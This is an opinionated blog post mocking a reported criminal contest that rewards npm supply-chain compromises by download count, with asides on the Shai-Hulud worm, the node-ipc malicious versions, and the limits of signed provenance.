Great. Malware has a leaderboard now.
That is the sentence I hate most this week, which is impressive because this week also included live npm poisonings, signed malicious packages, and the usual parade of people insisting the supply chain is fine right up until it punches them in the teeth.
According to Socket, TeamPCP and BreachForums are pushing a $1,000 Monero prize for the biggest Shai-Hulud package compromise. The scoring is based on download counts, and smaller compromises can be combined toward the total. So not only do we have criminals poisoning software, we have criminals turning poisoning software into a dumb little esports bracket.
Lovely. Inspirational. Put it on a t-shirt and set the t-shirt on fire.
The prize is tiny because the real money is elsewhere
The part that makes this grotesque is not the $1,000. That number is a joke, and everyone involved knows it.
If you can get into a CI pipeline, steal maintainer tokens, harvest cloud creds, or plant yourself in a package that every other repo depends on, the upside is not a grand. The upside is downstream access, resale value, extortion leverage, and the kind of credential pile that keeps a whole little sewer ecosystem in business.
So the bounty is not the payoff. It is the recruitment flyer.
It attracts the cheap, the reckless, and the clout-starved. People who will burn an access path just to see their handle on a forum thread. People who confuse notoriety with skill. People who think “reasonable proof” sounds like a professional standard instead of the most clownish phrase ever attached to a crime contest.
Gamifying compromise is how you get more compromise
The scoring rules are the part I find funniest in a very sick way. Weekly downloads. Monthly downloads. Combine smaller compromises if you want. Which means the contest literally encourages breadth.
That is not a defense strategy. That is a carnival game.
You are telling attackers to chase high-download packages, or spray the ecosystem with smaller hits until the scoreboard likes you. In other words: make it bigger, make it faster, make it noisier, and make the damage easier to justify in forum goblin logic.
I have seen enough “motivated” open source behavior to know exactly where this goes. Someone copies the toolchain. Someone else copies the copy. Then the entire scene fills up with little wannabe arsonists who learned just enough to be annoying and not enough to be ashamed.
The worst part is that the real attack is already happening
This is not some imaginary future where criminals might maybe get ideas.
Socket’s node-ipc report says malicious versions 9.1.6, 9.2.3, and 12.0.1 were detected within minutes of publication. Elsewhere in the same mess, the TanStack and Mistral packages were shipped with valid SLSA Build Level 3 attestations, stolen OIDC tokens, and enough legitimacy theater to fool a lot of people who still think a badge is a shield.
That is the actual joke here: the ecosystem is already under active attack, and now someone decided to hand out points for it.
The Shai-Hulud wave is grotesque because it does not just steal secrets. It also writes itself into places like Claude Code hooks and VS Code tasks, which means uninstalling the package is not the same thing as cleaning up the damage. The infection leaves little fingerprints in your tooling like a drunk raccoon with admin access.
Provenance is not magic, you sentimental idiot
Signed packages and provenance attestations matter. Obviously they matter.
They just do not matter in the way vendors sell them when they want you to stop asking uncomfortable questions.
If attackers can steal the identity layer, poison the workflow, or publish through the legitimate release path, then a pristine signature just means the malware came with paperwork. Congratulations, you built a very expensive stamp for the wrong envelope.
That is why this whole contest feels so rotten. It takes the already-bad lesson — trust is transitive, identity is brittle, maintainer machines are juicy — and turns it into a competition prompt.
The internet keeps confusing metrics with meaning
Download counts are not virtue. Stars are not trust. A signing badge is not morality. A forum leaderboard is not expertise. And a $1,000 prize is not a serious barrier to the kind of idiot who thinks “I compromised a package” sounds like a life plan.
The whole thing is just metrics all the way down.
That is probably why it landed so hard with me. We already have plenty of bad incentives in software: maintainers being underpaid, security teams being overworked, CI systems being overtrusted, and every registry in existence acting like “published by someone” is the same as “safe to install.” Now we get a criminal leaderboard bolted on top of that mess like a cheap spoiler on a car with no brakes.
If your threat model does not include bored creeps chasing forum clout with an open-source worm, then your threat model is a museum piece.
And if you are still acting surprised that the supply chain has become a circus, congratulations: you are the clown, and the tickets are already sold.